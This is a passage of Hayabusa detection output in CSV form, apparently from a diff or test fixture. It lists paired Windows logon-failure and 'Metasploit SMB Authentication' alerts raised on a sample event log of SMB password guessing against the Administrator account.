+2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGgNAKJM5RAt9B5K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c3DpedXujvQpZnjQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BsaSjESaUHbsIxJL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ca4dlxyEco3VOapw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6lJc7DXAOcNZ2G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Olt5mS7na07VDJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCFeQcUMDTs0ev8v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYmH6CQrizoZ1DAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iYtujXkzySwZQFk8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KE9v6wzrebvjvDIl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81gmRFFBHI1s4dqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C8gHWPDjQM8M3tiQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: szj4mJvtFV06CuR2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ceGEl87hOM0InAAd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XRv3C3rRxYXTgckj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TaPkJPIQnbL3VyUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZ7PZAT6hWWHNc29  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJVD4uVhwfLSJ6Ab  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6KME1I6tE0v9UAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Qtt1rk4n3tOJko2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: prPsA8EZHGfGPSHm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQqGXnwHtB87LSzT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6uLT1bjaIS0XBsWC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIgpraQTxFrcLphN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1D6qy57XImq4prx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Kw44Ffh4DIPlyuM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oKUdmKU74RmJysAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZUTzZw0T1tYRSP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nEOfjuAMa7HTsfcP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e7bG19emMTmyBQNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YsLkgWukfqS3wWJK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: liFcZjjpY3xXwe9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBUgbfzx2OEcOxWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVCV0WoZmLTFNH71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJmxGOqck4oQi1kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w7lYqaUvEtTp18DK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ9xQmGn61JJDeQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XuMXpvY9fmLm0eBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ofesuNErTLWuN0k4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsNq7SThd3b8oTwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmRWg5gNRcxDMFjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JXrGn6LehVwTGNNj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIq9DS71jCjWbgdY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kw2BQbdUml0EPNOs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugOqsKQFGmmLac3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
